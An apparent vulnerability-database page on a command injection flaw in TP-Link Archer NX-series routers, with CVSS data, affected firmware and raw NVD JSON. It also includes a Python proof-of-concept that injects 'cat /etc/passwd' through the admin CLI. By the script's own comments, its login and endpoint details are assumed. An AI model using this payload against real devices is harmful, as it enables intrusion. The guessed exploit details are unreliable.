CVE-2025-15518

Description

Improper input handling in a wireless-control administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

TP-Link Archer NX200 (特定固件版本)

TP-Link Archer NX210 (特定固件版本)

TP-Link Archer NX500 (特定固件版本)

TP-Link Archer NX600 (特定固件版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-15518 (Command Injection)
# This script demonstrates how an authenticated admin might trigger the vulnerability.
# Usage: python3 poc.py <target_ip> <admin_password>

import requests
import sys
import urllib.parse

def exploit(target_ip, password):
    login_url = f"http://{target_ip}/"
    cli_url = f"http://{target_ip}/admin/cli"
    
    session = requests.Session()
    
    # 1. Authenticate (Simplified logic, actual mechanism may vary)
    print("[*] Attempting to login...")
    login_data = {
        "username": "admin",
        "password": password
    }
    # Assuming standard login flow, cookie handling needed
    try:
        r = session.post(login_url, data=login_data, timeout=5)
        if r.status_code != 200:
            print("[-] Login failed")
            return
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return

    print("[+] Login successful")

    # 2. Send malicious payload to vulnerable CLI command
    # The vulnerability is in the wireless-control administrative CLI command.
    # Injecting a simple 'reboot' command or 'cat /etc/passwd'
    payload = "some_valid_param; cat /etc/passwd #"
    
    # Encoding payload for HTTP transmission
    encoded_payload = urllib.parse.quote(payload)
    
    # Constructing the malicious CLI command
    # Note: The exact parameter name and endpoint structure depend on the firmware implementation
    cli_command = f"wireless-control {payload}"
    
    print(f"[*] Sending payload: {cli_command}")
    
    data = {
        "command": cli_command
    }
    
    try:
        r = session.post(cli_url, data=data, timeout=5)
        print("[+] Response received:")
        print(r.text)
        
        if "root:" in r.text:
            print("[!] Command injection successful! /etc/passwd leaked.")
        else:
            print("[-] Exploit did not return expected output (might still be blind RCE).")
            
    except Exception as e:
        print(f"[-] Exploit error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <admin_password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15518
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15518
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15518/
[4] VulDB https://vuldb.com/cve/CVE-2025-15518
[5] https://www.tp-link.com/en/support/download/archer-nx200/#Firmware
[6] https://www.tp-link.com/en/support/download/archer-nx210/#Firmware
[7] https://www.tp-link.com/en/support/download/archer-nx500/#Firmware
[8] https://www.tp-link.com/en/support/download/archer-nx600/#Firmware
[9] https://www.tp-link.com/us/support/faq/5027/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15518", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T18:16:23.630", "lastModified": "2026-03-31T19:05:01.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input handling in a wireless-control administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device."}, {"lang": "es", "value": "Manejo inadecuado de entradas en un comando CLI administrativo de control inalámbrico en TP-Link Archer NX200, NX210, NX500 y NX600 permite que una entrada manipulada sea ejecutada como parte de un comando del sistema operativo. Un atacante autenticado con privilegios administrativos puede ejecutar comandos arbitrarios en el sistema operativo, impactando la confidencialidad, integridad y disponibilidad del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "77429691-1193-4480-A64E-E1FB19D6A073"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "58132EDD-47B7-4E46-B280-FE58A920AE43"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "70EF52E9-1D92-4778-99C5-3B76B81681FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "40D78DBB-CAEA-4C2E-B703-2898B73A0A5E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "22EA51B1-332E-48BB-BDBA-09A99ECB942F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA336E76-7910-4780-BCA0-1DA2AA7F9418"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "48125D02-70B1-4448-BB33-4759FF0E3936"}]}, {"operator": "OR", "negate": false, ... (truncated)